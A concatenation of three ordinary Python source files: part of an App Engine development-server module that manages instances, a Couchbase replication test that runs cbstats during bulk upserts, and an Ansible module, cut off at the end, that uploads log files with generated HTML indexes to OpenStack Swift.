except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = appinfo.MODULE_SEPARATOR.join([
self._module_configuration.module_name,
self._module_configuration.version_id.split('.', 1)[0]])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raised is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed out while waiting for another one to complete']
def restart(self):
"""Restarts the the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ' + str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
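# Illustrative usage sketch (not part of the original source), assuming
# `module` is an InteractiveCommandModule obtained from
# create_interactive_command_module():
#   try:
#       output = module.send_interactive_command('print 5+5')
#   except InteractiveCommandError as e:
#       output = str(e)
#   # On success, `output` holds the captured response body, e.g. '10\n'.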
|
cbStatsHashTest.py
|
from xdcrbasetests import XDCRReplicationBaseTest
from threading import Thread
from time import sleep
from remote.remote_util import RemoteMachineShellConnection
"""Testing timeouts to upsert due to cbstats hash traversal"""
class CbstatsHashTest(XDCRReplicationBaseTest):
def setUp(self):
super(CbstatsHashTest, self).setUp()
def tearDown(self):
super(CbstatsHashTest, self).tearDown()
def setup_extended(self):
pass
def __setup_replication_clusters(self, src_master, dest_master, src_cluster_name, dest_cluster_name):
self._link_clusters(src_master, dest_cluster_name, dest_master)
self._link_clusters(dest_master, src_cluster_name, src_master)
def test_verify_mb30553(self):
# Setup unidirectional replication
src_cluster_name, dest_cluster_name = "remote-dest-src", "remote-src-dest"
self.__setup_replication_clusters(self.src_master, self.dest_master, src_cluster_name, dest_cluster_name)
self._replicate_clusters(self.src_master, dest_cluster_name)
# Run upsert thread
thread = Thread(target=self.run_upsert)
thread.start()
# Ramp up phase
sleep(10)
node = self.src_master.get_master_node()
conn = RemoteMachineShellConnection(node)
command = "/opt/couchbase/bin/cbstats -u cbadminbucket -p password " + node.ip + ":11210 -b default hash"
output, error = conn.execute_command(command)
conn.log_command_output(output, error)
thread.join()
def run_upsert(self):
buckets = self._get_cluster_buckets(self.src_master)
for bucket in buckets:
if bucket.name == 'default':
for keySuffix in range(1, 1000000):
bucket.upsert('key' + str(keySuffix), 'Value ' + str(keySuffix), replicate_to=1)
|
zuul_swift_upload.py
|
#!/usr/bin/env python3
#
# Copyright 2014 Rackspace Australia
# Copyright 2018 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
"""
Utility to upload files to swift
"""
import argparse
import logging
import mimetypes
import os
try:
import queue as queuelib
except ImportError:
import Queue as queuelib
import shutil
import stat
import sys
import tempfile
import threading
import time
import zlib
import collections
import openstack
import requests
import requests.exceptions
import requestsexceptions
from ansible.module_utils.basic import AnsibleModule
try:
# Python 3.3+
from collections.abc import Sequence
except ImportError:
from collections import Sequence
mimetypes.init()
mimetypes.add_type('text/plain', '.yaml')
MAX_UPLOAD_THREADS = 24
POST_ATTEMPTS = 3
# Map mime types to apache icons
APACHE_MIME_ICON_MAP = {
'_default': 'unknown.png',
'application/gzip': 'compressed.png',
'application/directory': 'folder.png',
'text/html': 'text.png',
'text/plain': 'text.png',
}
# Map mime types to apache icons
APACHE_FILE_ICON_MAP = {
'..': 'back.png',
}
# These icon files are from the Apache project and are in the public
# domain.
ICON_IMAGES = {
'back.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAElBMVEX/'
'///M//+ZmZlmZmYzMzMAAACei5rnAAAAAnRSTlP/AOW3MEoAAABWSURB'
'VHjabdBBCgAhDEPRRpv7X3kwEMsQ//IRRC08urjRHbha5VLFUsVSxVI9'
'lmDh5hMpHD6n0EgoiZG0DNINpnWlcVXaRix76e1/8dddcL6nG0Ri9gHj'
'tgSXKYeLBgAAAABJRU5ErkJggg==',
'compressed.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAADAFBM'
'VEX//////8z//5n//2b//zP//wD/zP//zMz/zJn/zGb/zDP/zAD/'
'mf//mcz/mZn/mWb/mTP/mQD/Zv//Zsz/Zpn/Zmb/ZjP/ZgD/M///'
'M8z/M5n/M2b/MzP/MwD/AP//AMz/AJn/AGb/ADP/AADM///M/8zM'
'/5nM/2bM/zPM/wDMzP/MzMzMzJnMzGbMzDPMzADMmf/MmczMmZnM'
'mWbMmTPMmQDMZv/MZszMZpnMZmbMZjPMZgDMM//MM8zMM5nMM2bM'
'MzPMMwDMAP/MAMzMAJnMAGbMADPMAACZ//+Z/8yZ/5mZ/2aZ/zOZ'
'/wCZzP+ZzMyZzJmZzGaZzDOZzACZmf+ZmcyZmZmZmWaZmTOZmQCZ'
'Zv+ZZsyZZpmZZmaZZjOZZgCZM/+ZM8yZM5mZM2aZMzOZMwCZAP+Z'
'AMyZAJmZAGaZADOZAABm//9m/8xm/5lm/2Zm/zNm/wBmzP9mzMxm'
'zJlmzGZmzDNmzABmmf9mmcxmmZlmmWZmmTNmmQBmZv9mZsxmZplm'
'ZmZmZjNmZgBmM/9mM8xmM5lmM2ZmMzNmMwBmAP9mAMxmAJlmAGZm'
'ADNmAAAz//8z/8wz/5kz/2Yz/zMz/wAzzP8zzMwzzJkzzGYzzDMz'
'zAAzmf8zmcwzmZkzmWYzmTMzmQAzZv8zZswzZpkzZmYzZjMzZgAz'
'M/8zM8wzM5kzM2YzMzMzMwAzAP8zAMwzAJkzAGYzADMzAAAA//8A'
'/8wA/5kA/2YA/zMA/wAAzP8AzMwAzJkAzGYAzDMAzAAAmf8AmcwA'
'mZkAmWYAmTMAmQAAZv8AZswAZpkAZmYAZjMAZgAAM/8AM8wAM5kA'
'M2YAMzMAMwAAAP8AAMwAAJkAAGYAADPuAADdAAC7AACqAACIAAB3'
'AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARAAA'
'IgAAEQAAAO4AAN0AALsAAKoAAIgAAHcAAFUAAEQAACIAABHu7u7d'
'3d27u7uqqqqIiIh3d3dVVVVEREQiIiIREREAAAD7CIKZAAAAJXRS'
'TlP///////////////////////////////////////////////8A'
'P89CTwAAAGtJREFUeNp9z9ENgDAIhOEOco+dybVuEXasFMRDY/x5'
'+xJCO6Znu6kSx7BhXyjtKBWWNlwW88Loid7hFRKBXiIYCMfMEYUQ'
'QohC3CjFA5nIjqx1CqlDLGR/EhM5O06yvin0ftGOyIS7lV14AsQN'
'aR7rMEBYAAAAAElFTkSuQmCC',
'folder.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAElBMVEX/'
'////zJnM//+ZZjMzMzMAAADCEvqoAAAAA3RSTlP//wDXyg1BAAAASElE'
'QVR42s3KQQ6AQAhDUaXt/a/sQDrRJu7c+NmQB0e99B3lnqjT6cYx6zSI'
'bV40n3D7psYMoBoz4w8/EdNYQsbGEjNxYSljXTEsA9O1pLTvAAAAAElF'
'TkSuQmCC',
'text.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAD1BMVEX/'
'///M//+ZmZkzMzMAAABVsTOVAAAAAnRSTlP/AOW3MEoAAABISURBVHja'
'tcrRCgAgCENRbf7/N7dKomGvngjhMsPLD4NdMPwia438NRIyxsaL/XQZ'
'hyxpkC6zyjLXGVXnkhqWJWIIrOgeinECLlUCjBCqNQoAAAAASUVORK5C'
'YII=',
'unknown.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAD1BMVEX/'
'///M//+ZmZkzMzMAAABVsTOVAAAAAnRSTlP/AOW3MEoAAABYSURBVHja'
'ncvRDoAgDEPRruX/v1kmNHPBxMTLyzgD6FmsILg56g2hQnJkOco4yZhq'
'tN5nYd5Zq0LsHblwxwP9GTCWsaGtoelANKzOlz/RfaLYUmLE6E28ALlN'
'AupSdoFsAAAAAElFTkSuQmCC'}
def get_mime_icon(mime, filename=''):
icon = (APACHE_FILE_ICON_MAP.get(filename) or
APACHE_MIME_ICON_MAP.get(mime) or
APACHE_MIME_ICON_MAP['_default'])
return "data:image/png;base64,%s" % ICON_IMAGES[icon]
def sizeof_fmt(num, suffix='B'):
# From http://stackoverflow.com/questions/1094841/
# reusable-library-to-get-human-readable-version-of-file-size
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
class FileDetail():
"""
Used to generate indexes with links or as the file path
to push to swift.
"""
def __init__(self, full_path, relative_path, filename=None):
"""
Args:
full_path (str): The absolute path to the file on disk.
relative_path (str): The relative path from the artifacts source
used for links.
filename (str): An optional alternate filename in links.
"""
self.full_path = full_path
if filename is None:
self.filename = os.path.basename(full_path)
else:
self.filename = filename
self.relative_path = relative_path
if self.full_path and os.path.isfile(self.full_path):
mime_guess, encoding = mimetypes.guess_type(self.full_path)
self.mimetype = mime_guess if mime_guess else 'text/plain'
self.encoding = encoding
self.folder = False
else:
self.mimetype = 'application/directory'
self.encoding = None
self.folder = True
if self.full_path:
st = os.stat(self.full_path)
self.last_modified = time.gmtime(st[stat.ST_MTIME])
self.size = st[stat.ST_SIZE]
else:
self.last_modified = time.gmtime(0)
self.size = 0
def __repr__(self):
t = 'Folder' if self.folder else 'File'
return '<%s %s>' % (t, self.relative_path)
class FileList(Sequence):
'''A collection of FileDetail objects
This is a list-like group of FileDetail objects, intended to be
used as a context manager around the upload process.
'''
def __init__(self):
self.file_list = []
self.file_list.append(FileDetail(None, '', ''))
self.tempdirs = []
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
for tempdir in self.tempdirs:
shutil.rmtree(tempdir)
def __getitem__(self, item):
return self.file_list.__getitem__(item)
def __len__(self):
return self.file_list.__len__()
def get_tempdir(self):
'''Get a temporary directory
Returns path to a private temporary directory which will be
cleaned on exit
'''
tempdir = tempfile.mkdtemp(prefix='s-u-l-tmp')
self.tempdirs.append(tempdir)
return tempdir
@staticmethod
def _path_in_tree(root, path):
full_path = os.path.realpath(os.path.abspath(
os.path.expanduser(path)))
if not full_path.startswith(root):
logging.debug("Skipping path outside root: %s" % (path,))
return False
return True
def add(self, file_path):
"""
Generate a list of files to upload to swift. Recurses through
directories
"""
# file_list: A list of FileDetails to push to swift
file_list = []
if os.path.isfile(file_path):
relative_path = os.path.basename(file_path)
file_list.append(FileDetail(file_path, relative_path))
elif os.path.isdir(file_path):
original_root = os.path.realpath(os.path.abspath(
os.path.expanduser(file_path)))
parent_dir = os.path.dirname(file_path)
if not file_path.endswith('/'):
filename = os.path.basename(file_path)
full_path = file_path
relative_name = os.path.relpath(full_path, parent_dir)
file_list.append(FileDetail(full_path, relative_name,
filename))
# TODO: this will copy the result of symlinked files, but
# it won't follow directory symlinks. If we add that, we
# should ensure that we don't loop.
for path, folders, files in os.walk(file_path):
                # Sort folders and files in-place so that we recurse in order.
files.sort(key=lambda x: x.lower())
folders.sort(key=lambda x: x.lower())
# relative_path: The path between the given directory
# and the one being currently walked.
relative_path = os.path.relpath(path, parent_dir)
for filename in folders:
full_path = os.path.join(path, filename)
if not self._path_in_tree(original_root, full_path):
continue
relative_name = os.path.relpath(full_path, parent_dir)
file_list.append(FileDetail(full_path, relative_name,
filename))
for filename in files:
full_path = os.path.join(path, filename)
if not self._path_in_tree(original_root, full_path):
continue
relative_name = os.path.relpath(full_path, parent_dir)
file_detail = FileDetail(full_path, relative_name)
file_list.append(file_detail)
self.file_list += file_list
class Indexer():
"""Index a FileList
Functions to generate indexes and other collated data for a
FileList
- make_indexes() : make index.html in folders
"""
def __init__(self, file_list):
'''
Args:
file_list (FileList): A FileList object with all files
to be indexed.
'''
assert isinstance(file_list, FileList)
self.file_list = file_list
def _make_index_file(self, folder_links, title, tempdir, append_footer):
"""Writes an index into a file for pushing"""
for file_details in folder_links:
# Do not generate an index file if one exists already.
# This may be the case when uploading other machine generated
# content like python coverage info.
if self.index_filename == file_details.filename:
return
index_content = self._generate_log_index(
folder_links, title, append_footer)
        index_file = os.path.join(tempdir, self.index_filename)
        with open(index_file, 'w') as fd:
            fd.write(index_content)
        return index_file
def _generate_log_index(self, folder_links, title, append_footer):
"""Create an index of logfiles and links to them"""
output = '<html><head><title>%s</title></head><body>\n' % title
output += '<h1>%s</h1>\n' % title
output += '<table><tr><th></th><th>Name</th><th>Last Modified</th>'
output += '<th>Size</th></tr>'
file_details_to_append = None
for file_details in folder_links:
output += '<tr>'
output += (
'<td><img alt="[ ]" title="%(m)s" src="%(i)s"></img></td>' % ({
'm': file_details.mimetype,
'i': get_mime_icon(file_details.mimetype,
file_details.filename),
}))
filename = file_details.filename
if file_details.folder:
filename += '/'
output += '<td><a href="%s">%s</a></td>' % (filename,
filename)
output += '<td>%s</td>' % time.asctime(
file_details.last_modified)
size = sizeof_fmt(file_details.size, suffix='')
output += '<td style="text-align: right">%s</td>' % size
output += '</tr>\n'
if (append_footer and
append_footer in file_details.filename):
file_details_to_append = file_details
output += '</table>'
if file_details_to_append:
output += '<br /><hr />'
try:
with open(file_details_to_append.full_path, 'r') as f:
output += f.read()
except IOError:
logging.exception("Error opening file for appending")
output += '</body></html>\n'
return output
def make_indexes(self, create_parent_links=True,
create_topdir_parent_link=False,
append_footer='index_footer.html'):
'''Make index.html files
        Iterate the file list and create index.html files for folders
Args:
create_parent_links (bool): Create parent links
create_topdir_parent_link (bool): Create topdir parent link
append_footer (str): Filename of a footer to append to each
generated page
Return:
No value, the self.file_list will be updated
'''
self.index_filename = 'index.html'
folders = collections.OrderedDict()
for f in self.file_list:
if f.folder:
folders[f.relative_path] = []
folder = os.path.dirname(os.path.dirname(
f.relative_path + '/'))
if folder == '/':
folder = ''
else:
folder = os.path.dirname(f.relative_path)
folders[folder].append(f)
indexes = {}
parent_file_detail = FileDetail(None, '..', '..')
for folder, files in folders.items():
# Don't add the pseudo-top-directory
if files and files[0].full_path is None:
files = files[1:]
if create_topdir_parent_link:
files = [parent_file_detail] + files
elif create_parent_links:
files = [parent_file_detail] + files
# Do generate a link to the parent directory
full_path = self._make_index_file(files, 'Index of %s' % (folder,),
self.file_list.get_tempdir(),
append_footer)
if full_path:
filename = os.path.basename(full_path)
relative_name = os.path.join(folder, filename)
indexes[folder] = FileDetail(full_path, relative_name)
# This appends the index file at the end of the group of files
# for each directory.
new_list = []
last_dirname = None
for f in reversed(list(self.file_list)):
if f.folder:
relative_path = f.relative_path + '/'
else:
relative_path = f.relative_path
dirname = os.path.dirname(relative_path)
if dirname == '/':
dirname = ''
if dirname != last_dirname:
index = indexes.pop(dirname, None)
if index:
new_list.append(index)
last_dirname = dirname
new_list.append(f)
new_list.reverse()
self.file_list.file_list = new_list
class DeflateFilter():
chunk_size = 16384
def __init__(self, infile):
self.infile = infile
self.encoder = zlib.compressobj()
self.done = False
def __iter__(self):
return self
def __next__(self):
if self.done:
raise StopIteration()
ret = b''
while True:
data = self.infile.read(self.chunk_size)
if data:
ret = self.encoder.compress(data)
if ret:
break
else:
self.done = True
ret = self.encoder.flush()
break
return ret
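# Usage sketch (hedged; mirrors how _post_file below streams uploads, and the
# filename is only illustrative): wrapping an open binary file in DeflateFilter
# yields zlib-compressed chunks lazily, so large logs need not be read into
# memory at once. For example:
#   with open('console.log', 'rb') as f:
#       compressed = b''.join(DeflateFilter(f))  # deflate-compressed bytes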
class Uploader():
def __init__(self, cloud, container, prefix=None, delete_after=None,
public=True):
if isinstance(cloud, dict):
config = openstack.config.loader.OpenStackConfig().get_one(**cloud)
self.cloud = openstack.connection.Connection(config=config)
else:
self.cloud = openstack.connect(cloud=cloud)
self.container = container
self.prefix = prefix or ''
self.delete_after = delete_after
sess = self.cloud.config.get_session()
adapter = requests.adapters.HTTPAdapter(pool_maxsize=100)
sess.mount('https://', adapter)
if not self.cloud.get_container(self.container):
self.cloud.create_container(name=self.container, public=public)
self.cloud.update_container(
name=self.container,
headers={'X-Container-Meta-Web-Index': 'index.html'})
# 'X-Container-Meta-Web-Listings': 'true'
# The ceph radosgw swift implementation requires an
# index.html at the root in order for any other indexes to
# work.
self.cloud.create_object(self.container,
name='index.html',
data='',
content_type='text/html')
self.url = os.path.join(self.cloud.object_store.get_endpoint(),
self.container, self.prefix)
def upload(self, file_list):
"""Spin up thread pool to upload to swift"""
num_threads = min(len(file_list), MAX_UPLOAD_THREADS)
threads = []
queue = queuelib.Queue()
# add items to queue
for f in file_list:
queue.put(f)
for x in range(num_threads):
t = threading.Thread(target=self.post_thread, args=(queue,))
threads.append(t)
t.start()
for t in threads:
t.join()
def post_thread(self, queue):
while True:
try:
file_detail = queue.get_nowait()
logging.debug("%s: processing job %s",
threading.current_thread(),
file_detail)
self._post_file(file_detail)
except requests.exceptions.RequestException:
# Do our best to attempt to upload all the files
logging.exception("Error posting file after multiple attempts")
continue
except IOError:
# Do our best to attempt to upload all the files
logging.exception("Error opening file")
continue
except queuelib.Empty:
# No more work to do
return
@staticmethod
def _is_text_type(mimetype):
# We want to compress all text types.
if mimetype.startswith('text/'):
return True
        # Also compress types that typically contain text but are not
        # a text subtype.
compress_types = [
'application/json',
'image/svg+xml',
]
if mimetype in compress_types:
return True
return False
def _post_file(self, file_detail):
relative_path = os.path.join(self.prefix, file_detail.relative_path)
headers = {}
if self.delete_after:
headers['x-delete-after'] = str(self.delete_after)
headers['content-type'] = file_detail.mimetype
for attempt in range(1, POST_ATTEMPTS + 1):
try:
if not file_detail.folder:
if (file_detail.encoding is None and
self._is_text_type(file_detail.mimetype)):
headers['content-encoding'] = 'deflate'
data = DeflateFilter(open(file_detail.full_path, 'rb'))
else:
if file_detail.encoding:
headers['content-encoding'] = file_detail.encoding
data = open(file_detail.full_path, 'rb')
else:
data = ''
relative_path = relative_path.rstrip('/')
if relative_path == '':
relative_path = '/'
self.cloud.create_object(self.container,
name=relative_path,
data=data,
**headers)
break
except requests.exceptions.RequestException:
logging.exception(
"File posting error on attempt %d" % attempt)
if attempt >= POST_ATTEMPTS:
raise
def run(cloud, container, files,
indexes=True, parent_links=True, topdir_parent_link=False,
partition=False, footer='index_footer.html', delete_after=15552000,
prefix=None, public=True, dry_run=False):
if prefix:
prefix = prefix.lstrip('/')
if partition and prefix:
parts = prefix.split('/')
if len(parts) > 1:
container += '_' + parts[0]
prefix = '/'.join(parts[1:])
# Create the objects to make sure the arguments are sound.
with FileList() as file_list:
# Scan the files.
for file_path in files:
file_list.add(file_path)
indexer = Indexer(file_list)
# (Possibly) make indexes.
if indexes:
indexer.make_indexes(create_parent_links=parent_links,
create_topdir_parent_link=topdir_parent_link,
append_footer=footer)
logging.debug("List of files prepared to upload:")
for x in file_list:
logging.debug(x)
        # Do not connect to swift or do any uploading in a dry run
if dry_run:
# No URL is known, so return nothing
return
# Upload.
uploader = Uploader(cloud, container, prefix, delete_after,
public)
uploader.upload(file_list)
return uploader.url
def ansible_main():
module = AnsibleModule(
argument_spec=dict(
cloud=dict(required=True, type='raw'),
container=dict(required=True, type='str'),
files=dict(required=True, type='list'),
partition=dict(type='bool', default=False),
indexes=dict(type='bool', default=True),
parent_links=dict(type='bool', default=True),
topdir_parent_link=dict(type='bool', default=False),
public=dict(type='bool', default=True),
footer=dict(type='str'),
delete_after=dict(type='int'),
prefix=dict(type='str'),
)
)
p = module.params
url = run(p.get('cloud'), p.get('container'), p.get('files'),
indexes=p.get('indexes'),
parent_links=p.get('parent_links'),
topdir_parent_link=p.get('topdir_parent_link'),
